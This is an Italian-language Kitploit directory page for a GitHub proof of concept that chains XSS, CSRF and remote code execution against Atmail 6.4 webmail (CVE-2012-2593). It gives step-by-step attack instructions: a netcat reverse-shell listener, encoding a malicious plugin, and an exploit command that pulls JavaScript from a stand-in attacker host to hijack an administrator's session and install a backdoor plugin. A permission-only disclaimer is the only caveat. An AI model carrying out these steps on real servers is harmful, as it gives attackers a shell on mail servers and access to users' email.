Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2012-2593 — Catena di exploit Atmail XSS-CSRF-RCE | Kitploit
Strumenti/GitHubGitHub/andrewtrube/cve-2012-2593
Framework di ExploitGenerazione di PayloadExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Catena di exploit Atmail XSS-CSRF-RCE

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Atmail - Catena di Exploit XSS-CSRF-RCE PoC

atmail-rce.py: Sfrutta CVE-2012-2593 nell'interfaccia webmail di Atmail.

atmail-csrf.js: File Javascript che sfrutta CVE-2012-2593 per effettuare un CSRF al fine di installare un plugin malevolo che esegue una reverse shell

Plugin.php: Plugin di Atmail da installare che richiama una reverse shell

!!Utilizzare solo contro server su cui si ha il permesso di testare

Sommario

Il server email Atmail versione 6.4 presenta una vulnerabilità XSS sia nell'intestazione email Date che nel Corpo dell'email (tramite iniezione di iFrame). Questo viene sfruttato per un CSRF utilizzando l'API XHR di Javascript per inviare una richiesta con il cookie dell'utente amministratore al pannello di amministrazione, installando un Plugin malevolo che esegue codice per una reverse shell.

Prova di Concetto

  1. Avvia un listener netcat nc -lvp 4444
  2. Apri Plugin.php e modifica l'indirizzo IP e la porta con quelli del tuo listener netcat
  3. Comprimi Plugin usando gzip e codifica in base64 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. Copia e incolla l'output sopra nella variabile data di atmail-csrf.js
  5. Esegui lo script atmail-rce.py python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. Attendi che l'utente amministratore acceda alla propria email

Avvertenze

  • Funziona solo se il bersaglio dell'XSS è un utente amministratore di Atmail
  • Funziona solo se il bersaglio ha effettuato l'accesso sia all'interfaccia webmail che all'interfaccia di amministrazione del server
  • Funziona solo se l'installazione dei plugin è consentita sul server (attiva per impostazione predefinita)
Scarica lo strumento